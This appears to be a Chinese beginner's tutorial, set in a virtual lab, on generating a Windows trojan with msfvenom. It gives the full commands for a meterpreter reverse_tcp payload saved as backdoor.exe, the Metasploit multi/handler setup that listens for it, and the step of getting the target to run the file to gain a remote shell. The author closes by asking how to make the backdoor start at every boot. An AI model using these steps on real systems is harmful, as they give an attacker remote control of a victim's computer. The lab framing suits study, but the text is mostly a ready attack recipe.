警告!本文章纯属用于学习使用,非作者允许严禁转载!严禁用于非法用途!因阅读本文章产生的任何非法行为以及任何后果跟作者无关!
准备:
1.虚拟机(攻击机)Kali Linux2023
2.虚拟机(靶机1)windows 7
3.虚拟机(靶机2)windows 10
--------------------—-------------------------
正式开始:
首先用攻击机生成一个windows平台的木马
- 在Kali中以root身份打开命令提示符
- 运行msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.100.48(攻击机IP地址 )lport=2024(指定一个监听端口) -f exe -o /var/backdoor.exe
- 这样的话我们就会看到在var目录下有一个名为backdoor的exe文件。我们把这个文件拖动到windows靶机中。
- 接着我们来配置一下攻击载荷。在命令提示符中输入msfconsole启动MSF。
- 输入命令use exploit/multi/handler
- 输入命令set payload
- 输入命令windows/meterpreter/reverse_tcp
- 输入命令set lhost 192.168.100.48(前面攻击机的ip)
set lport 2024(前面生成木马时指定的端口) - 输入命令 exploit用来开启监听
- 在靶机中点击我们刚才移进去的木马。
- 如果成功的话会看到在攻击机命令提示符上显示meterpreter>
这时候可以输入我们想要控制靶机的命令。但是要注意。虽然控制的是windows平台,但是指令要用Kali的。还有就是这个木马并没有生成一个永久后门,所以关机或者重启之后,如果他不再重新点击这个木马,木马将不再生效。
本人也是纯小白,求大佬指导怎么生成永久后门,就是只要一开机就启动木马的那种(求求了